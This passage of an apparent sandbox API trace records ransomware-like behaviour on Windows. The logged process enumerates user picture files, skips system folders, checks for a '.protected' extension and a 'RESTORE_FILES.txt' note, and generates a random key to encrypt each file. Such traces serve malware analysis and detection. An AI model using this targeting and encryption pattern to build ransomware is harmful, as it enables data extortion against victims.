lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.249] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.249] lstrcmpiW (lpString1="usertile23.bmp", lpString2="Windows") returned -1 [0093.249] lstrcmpiW (lpString1="usertile23.bmp", lpString2="Program Files") returned 1 [0093.249] lstrcmpiW (lpString1="usertile23.bmp", lpString2="Program Files (x86)") returned 1 [0093.249] lstrcmpiW (lpString1="usertile23.bmp", lpString2="$Recycle.bin") returned 1 [0093.249] lstrcmpiW (lpString1="usertile23.bmp", lpString2="System Volume Information") returned 1 [0093.249] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp") returned 86 [0093.249] StrStrIW (lpFirst="usertile23.bmp", lpSrch=".protected") returned 0x0 [0093.249] lstrcmpW (lpString1="usertile23.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.249] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.249] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile23.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile23.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.249] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.249] lstrcmpiW (lpString1="usertile24.bmp", lpString2="Windows") returned -1 [0093.249] lstrcmpiW (lpString1="usertile24.bmp", lpString2="Program Files") returned 1 [0093.249] lstrcmpiW (lpString1="usertile24.bmp", lpString2="Program Files (x86)") returned 1 [0093.249] lstrcmpiW (lpString1="usertile24.bmp", lpString2="$Recycle.bin") returned 1 [0093.249] lstrcmpiW (lpString1="usertile24.bmp", lpString2="System Volume Information") returned 1 [0093.249] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp") returned 86 [0093.249] StrStrIW (lpFirst="usertile24.bmp", lpSrch=".protected") returned 0x0 [0093.249] lstrcmpW (lpString1="usertile24.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.249] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.249] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile24.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile24.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.249] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.249] lstrcmpiW (lpString1="usertile25.bmp", lpString2="Windows") returned -1 [0093.249] lstrcmpiW (lpString1="usertile25.bmp", lpString2="Program Files") returned 1 [0093.249] lstrcmpiW (lpString1="usertile25.bmp", lpString2="Program Files (x86)") returned 1 [0093.250] lstrcmpiW (lpString1="usertile25.bmp", lpString2="$Recycle.bin") returned 1 [0093.250] lstrcmpiW (lpString1="usertile25.bmp", lpString2="System Volume Information") returned 1 [0093.250] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp") returned 86 [0093.250] StrStrIW (lpFirst="usertile25.bmp", lpSrch=".protected") returned 0x0 [0093.250] lstrcmpW (lpString1="usertile25.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.250] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.250] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile25.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile25.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.250] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.250] lstrcmpiW (lpString1="usertile26.bmp", lpString2="Windows") returned -1 [0093.250] lstrcmpiW (lpString1="usertile26.bmp", lpString2="Program Files") returned 1 [0093.250] lstrcmpiW (lpString1="usertile26.bmp", lpString2="Program Files (x86)") returned 1 [0093.250] lstrcmpiW (lpString1="usertile26.bmp", lpString2="$Recycle.bin") returned 1 [0093.250] lstrcmpiW (lpString1="usertile26.bmp", lpString2="System Volume Information") returned 1 [0093.250] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp") returned 86 [0093.250] StrStrIW (lpFirst="usertile26.bmp", lpSrch=".protected") returned 0x0 [0093.250] lstrcmpW (lpString1="usertile26.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.250] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.250] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.250] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile26.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile26.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.250] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.250] lstrcmpiW (lpString1="usertile27.bmp", lpString2="Windows") returned -1 [0093.250] lstrcmpiW (lpString1="usertile27.bmp", lpString2="Program Files") returned 1 [0093.250] lstrcmpiW (lpString1="usertile27.bmp", lpString2="Program Files (x86)") returned 1 [0093.250] lstrcmpiW (lpString1="usertile27.bmp", lpString2="$Recycle.bin") returned 1 [0093.250] lstrcmpiW (lpString1="usertile27.bmp", lpString2="System Volume Information") returned 1 [0093.250] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp") returned 86 [0093.250] StrStrIW (lpFirst="usertile27.bmp", lpSrch=".protected") returned 0x0 [0093.250] lstrcmpW (lpString1="usertile27.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.250] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.250] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile27.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile27.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.251] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.251] lstrcmpiW (lpString1="usertile28.bmp", lpString2="Windows") returned -1 [0093.251] lstrcmpiW (lpString1="usertile28.bmp", lpString2="Program Files") returned 1 [0093.251] lstrcmpiW (lpString1="usertile28.bmp", lpString2="Program Files (x86)") returned 1 [0093.251] lstrcmpiW (lpString1="usertile28.bmp", lpString2="$Recycle.bin") returned 1 [0093.251] lstrcmpiW (lpString1="usertile28.bmp", lpString2="System Volume Information") returned 1 [0093.251] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp") returned 86 [0093.251] StrStrIW (lpFirst="usertile28.bmp", lpSrch=".protected") returned 0x0 [0093.251] lstrcmpW (lpString1="usertile28.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.251] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.251] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile28.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile28.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.251] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.251] lstrcmpiW (lpString1="usertile29.bmp", lpString2="Windows") returned -1 [0093.251] lstrcmpiW (lpString1="usertile29.bmp", lpString2="Program Files") returned 1 [0093.251] lstrcmpiW (lpString1="usertile29.bmp", lpString2="Program Files (x86)") returned 1 [0093.251] lstrcmpiW (lpString1="usertile29.bmp", lpString2="$Recycle.bin") returned 1 [0093.251] lstrcmpiW (lpString1="usertile29.bmp", lpString2="System Volume Information") returned 1 [0093.251] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp") returned 86 [0093.251] StrStrIW (lpFirst="usertile29.bmp", lpSrch=".protected") returned 0x0 [0093.251] lstrcmpW (lpString1="usertile29.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.251] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.251] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile29.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile29.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.251] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.251] lstrcmpiW (lpString1="usertile30.bmp", lpString2="Windows") returned -1 [0093.251] lstrcmpiW (lpString1="usertile30.bmp", lpString2="Program Files") returned 1 [0093.252] lstrcmpiW (lpString1="usertile30.bmp", lpString2="Program Files (x86)") returned 1 [0093.252] lstrcmpiW (lpString1="usertile30.bmp", lpString2="$Recycle.bin") returned 1 [0093.252] lstrcmpiW (lpString1="usertile30.bmp", lpString2="System Volume Information") returned 1 [0093.252] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp") returned 86 [0093.252] StrStrIW (lpFirst="usertile30.bmp", lpSrch=".protected") returned 0x0 [0093.252] lstrcmpW (lpString1="usertile30.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.252] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.252] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile30.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile30.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.252] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.252] lstrcmpiW (lpString1="usertile31.bmp", lpString2="Windows") returned -1 [0093.252] lstrcmpiW (lpString1="usertile31.bmp", lpString2="Program Files") returned 1 [0093.252] lstrcmpiW (lpString1="usertile31.bmp", lpString2="Program Files (x86)") returned 1 [0093.252] lstrcmpiW (lpString1="usertile31.bmp", lpString2="$Recycle.bin") returned 1 [0093.252] lstrcmpiW (lpString1="usertile31.bmp", lpString2="System Volume Information") returned 1 [0093.252] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp") returned 86 [0093.252] StrStrIW (lpFirst="usertile31.bmp", lpSrch=".protected") returned 0x0 [0093.252] lstrcmpW (lpString1="usertile31.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.252] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.252] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile31.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile31.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.252] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.252] lstrcmpiW (lpString1="usertile32.bmp", lpString2="Windows") returned -1 [0093.252] lstrcmpiW (lpString1="usertile32.bmp", lpString2="Program Files") returned 1 [0093.252] lstrcmpiW (lpString1="usertile32.bmp", lpString2="Program Files (x86)") returned 1 [0093.252] lstrcmpiW (lpString1="usertile32.bmp", lpString2="$Recycle.bin") returned 1 [0093.252] lstrcmpiW (lpString1="usertile32.bmp", lpString2="System Volume Information") returned 1 [0093.252] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp") returned 86 [0093.252] StrStrIW (lpFirst="usertile32.bmp", lpSrch=".protected") returned 0x0 [0093.252] lstrcmpW (lpString1="usertile32.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.252] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.253] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile32.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile32.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.253] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.253] lstrcmpiW (lpString1="usertile33.bmp", lpString2="Windows") returned -1 [0093.253] lstrcmpiW (lpString1="usertile33.bmp", lpString2="Program Files") returned 1 [0093.253] lstrcmpiW (lpString1="usertile33.bmp", lpString2="Program Files (x86)") returned 1 [0093.253] lstrcmpiW (lpString1="usertile33.bmp", lpString2="$Recycle.bin") returned 1 [0093.253] lstrcmpiW (lpString1="usertile33.bmp", lpString2="System Volume Information") returned 1 [0093.253] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp") returned 86 [0093.253] StrStrIW (lpFirst="usertile33.bmp", lpSrch=".protected") returned 0x0 [0093.253] lstrcmpW (lpString1="usertile33.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.253] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.253] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile33.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile33.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.253] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.253] lstrcmpiW (lpString1="usertile34.bmp", lpString2="Windows") returned -1 [0093.253] lstrcmpiW (lpString1="usertile34.bmp", lpString2="Program Files") returned 1 [0093.253] lstrcmpiW (lpString1="usertile34.bmp", lpString2="Program Files (x86)") returned 1 [0093.253] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp") returned 86 [0093.253] StrStrIW (lpFirst="usertile34.bmp", lpSrch=".protected") returned 0x0 [0093.253] lstrcmpW (lpString1="usertile34.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.253] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.253] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile34.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile34.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.254] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.254] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp") returned 86 [0093.254] StrStrIW (lpFirst="usertile35.bmp", lpSrch=".protected") returned 0x0 [0093.254] lstrcmpW (lpString1="usertile35.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.254] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.254] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile35.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile35.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.254] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.254] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp") returned 86 [0093.254] StrStrIW (lpFirst="usertile36.bmp", lpSrch=".protected") returned 0x0 [0093.254] lstrcmpW (lpString1="usertile36.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.254] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.254] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile36.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile36.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.254] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.254] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp") returned 86 [0093.254] StrStrIW (lpFirst="usertile37.bmp", lpSrch=".protected") returned 0x0 [0093.254] lstrcmpW (lpString1="usertile37.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.254] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.254] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile37.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile37.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.254] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.254] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp") returned 86 [0093.254] StrStrIW (lpFirst="usertile38.bmp", lpSrch=".protected") returned 0x0 [0093.254] lstrcmpW (lpString1="usertile38.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.254] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.254] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile38.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.255] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.255] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp") returned 86 [0093.255] StrStrIW (lpFirst="usertile39.bmp", lpSrch=".protected") returned 0x0 [0093.255] lstrcmpW (lpString1="usertile39.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.255] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.255] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295ec74*=0x30) returned 1 [0093.255] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile39.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0093.255] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0093.255] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile40.bmp") returned 86 [0093.255] StrStrIW (lpFirst="usertile40.bmp", lpSrch=".protected") returned 0x0 [0093.255] lstrcmpW (lpString1="usertile40.bmp", lpString2="RESTORE_FILES.txt") returned 1 [0093.255] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0093.255] 